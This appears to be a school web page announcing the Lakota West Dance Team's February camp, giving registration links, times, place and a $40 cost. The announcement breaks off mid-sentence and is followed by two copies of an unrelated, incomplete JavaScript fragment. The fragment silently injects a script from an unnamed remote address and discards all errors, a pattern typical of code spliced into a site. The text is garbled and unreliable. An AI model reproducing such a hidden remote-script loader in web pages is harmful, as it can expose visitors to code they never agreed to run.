Uncategorized
Sign-up Now: Lakota West Dance Camp on Feb. 1st!
“The Lakota West Dance Team will be hosting their annual dance camp and performance on February 1st (camp) and February 8th (performance) this year! Camp participants will get the opportunity to perform at the varsity Lakota West vs. East girls basketball game!
***NEW – REGISTER AND PAY ONLINE! https://tinyurl.com/WestDanceCamp20
***Pay online via EZPAY! https://www.spsezpay.com/Lakota/login.aspx
8:30 am – 12:30 pm (Intermediate/Advance Dancers or Boys Hip Hop)
2 pm – 6:00 pm (Beginning/Intermediate Dancers)
Where: Lakota West Freshmen Building Gym
Cost: $40 – Includes a snack, a hat, and a performance t-shirt!Perform at the:
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();